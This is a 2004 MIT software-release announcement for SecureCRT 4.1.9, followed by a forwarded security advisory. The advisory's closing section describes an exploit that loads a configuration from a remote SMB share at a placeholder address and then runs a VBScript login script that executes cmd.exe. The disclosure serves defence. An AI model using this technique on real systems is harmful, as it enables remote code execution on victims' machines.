[WinPartners] SecureCRT 4.1.9 Release Announcement

Atticus Gifford atticus at MIT.EDU
Thu Dec 2 14:55:23 EST 2004

Date: Thursday, 2 December 2004
To: MIT Community: itpartners at mit.edu, winpartners at mit.edu, 
sw-release-announce at mit.edu, kakapo at mit.edu
Cc: itag at mit.edu, is&t at mit.edu
From: Software Release Team
Subject: SecureCRT 4.1.9 Release Announcement
Good Afternoon,

On behalf of the SecureCRT Release Team, I am pleased to announce the 
release of SecureCRT 4.1.9. This update to SecureCRT includes a fix for 
a critical vulnerability in earlier versions of SecureCRT.  It is 
recommended that all users update immediately to this latest version.  
For more information on the security threat patched in this version of 
SecureCRT please see the MIT IT Security Support Security Advisory 
copied at the end of this message.

This new installer also fixes several bugs in the SecureCRT 4.1.4 
installer, particularly for user accounts running SecureCRT other than 
the administrator who installed the software.

Notable Features of SecureCRT 4.1.9:
- Includes 4.1.9 binaries with critical security patch
- Adds path to VSH and VCP to PATH variable (for users who would like 
to use the command line)
- First-time users (i.e. anyone  but the account that installed 
SecureCRT) will only see a quick, one-time repair that doesn't require 
the installer to be on the user's system
- New "Create Athena Shortcut" item in the SecureCRT Program Files 
folder will create (and ask to overwrite if it exists) a shortcut to 
Athena.  This is instead of creating a shortcut via repair.  Only the 
installing account will have this shortcut automatically.
- Running the "Create Athena Shortcut" item will allow the user to 
create a GSSAPI (Kerberos Tickets) shortcut to Athena if they prefer 
(click Options... button)

Known Issues:
There are no known issues for this version of KfW.

How to Obtain:
You can download SecureCRT 4.1.9 from the MIT IS&T Windows Software 
Site: https://web.mit.edu/software/win.html. Please note that you need 
a current personal certificate to download this software. If you do not 
have a current personal certificate, then you can obtain one from 

Getting Help:
The SecureCRT 4.1.9 page is located at: 

If you have a question or need assistance, please contact the Computing 
Help Desk at computing-help at mit.edu or x3-1101.


Atticus Gifford
Installer Writer - Software Release Team
Information Services and Technology (IS&T)
Massachusetts Institute of Technology
Room W92-176
Cambridge, MA 02139
t: 617-452-2095
m: atticus at mit.edu

------------ MIT ITSS Security Advisory -----------

From: 	  mvan at MIT.EDU
Subject: 	Security Advisory:  Critical SecureCRT for Windows 
Date: 	December 2, 2004 12:52:31 PM EST
To: 	  security-fyi at mit.edu
Cc: 	  itss at mit.edu, swrt at mit.edu


Please be aware of the following security threat concerning SecureCRT 
V4.1 and earlier, and see below for further details:


     Date:      November 23, 2004
     Advisory:  NTBugtraq Advisory
     Affected:  SecureCRT V4.1, V4.0 (and probably lower)
     Impact:    All Windows platforms using SecureCRT -- Critical
     Action to Take: Update to Secure CRT V4.1.9


You can download Secure CRT V4.1.9 from the MIT IS&T Windows Software 
Site: https://web.mit.edu/software/win.html. Please note that you need 
a current personal certificate to download this software. If you do not 
have a current personal certificate, then you can obtain one from 

Notable Features of SecureCRT V4.1.9:
- Includes 4.1.9 binaries
- Adds path to VSH and VCP to PATH variable (for users who would like 
to use the command line)
- First-time users (i.e. anyone  but the account that installed 
SecureCRT) will only see a quick, one-time repair that doesn't require 
the installer to be on the user's system
- New "Create Athena Shortcut" item in the SecureCRT Program Files 
folder will create (and ask to overwrite if it exists) a shortcut to 
Athena.  This is instead of creating a shortcut via repair.  Only the 
installing account will have this shortcut automatically.
- Running the "Create Athena Shortcut" item will allow the user to 
create a GSSAPI (Kerberos Tickets) shortcut to Athena if they prefer 
(click Options... button)

Known Issues:
There are no known issues for this version of SecureCRT 4.1.9.

How to Obtain:
You can download Secure CRT V4.1.9 from the MIT IS&T Windows Software 
Site: https://web.mit.edu/software/win.html. Please note that you need 
a current personal certificate to download this software. If you do not 
have a current personal certificate, then you can obtain one from 

Getting Help:

If you have a question or need assistance, please contact the Computing 
Help Desk at computing-help at mit.edu or x3-1101.

Further Details on the Exploit:
There appears to be some filtering around the use of \ in the 
url->command line parsing, that prevents the specification of an SMB 
share to use for configuration. This can be easily bypassed and leads 
to the loading of a configuration file from a remote site.

The configuration file contains an entry that specifies the login 
script to run which can be set a file on the the remote share;

S:"Script Filename"=\\ipofshare\share\folder\scriptname

And the login script can then contain scripting such as;

# $language = "VBScript"
# $interface = "1.0"

Sub Main
dim wshShell, boolErr, strErrDesc
Set wshShell = CreateObject("WScript.Shell")
run = wshShell.Run ("cmd.exe /c dir >c:\shell.txt",0,True)
End Sub

Mark Van Dyke
IT Security Support
MIT Information Services & Technology
mvan at mit.edu

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